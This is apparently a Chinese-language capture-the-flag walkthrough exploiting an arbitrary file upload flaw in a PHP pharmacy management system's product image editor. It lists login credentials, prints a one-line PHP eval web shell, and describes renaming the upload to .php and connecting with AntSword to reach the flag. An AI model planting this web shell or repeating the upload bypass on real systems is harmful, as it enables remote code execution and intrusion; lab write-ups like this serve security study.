目录
靶标介绍
开启靶场
上传一句话木马
蚁剑连接
找到 flag
靶标介绍
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
开启靶场
根据社会工程学方法可得
邮箱:mayuri.infospace@gmail.com
密码:mayurik
登录成功
在这个页面发现了可以上传文件的地方
上传一句话木马
上传一句话木马 1.jpg,内容为:
<?php @eval($_POST[cmd]);?>
抓包,发送到 repeater,修改后缀为 php,发送请求,发现上传成功了,看来文件上传点就在这里
检查页面,搜索 1.php,发现了上传路径是“assets/myimages/1.php”
蚁剑连接
使用 base64 编码
连接成功,在根目录下找到了 flag 文件夹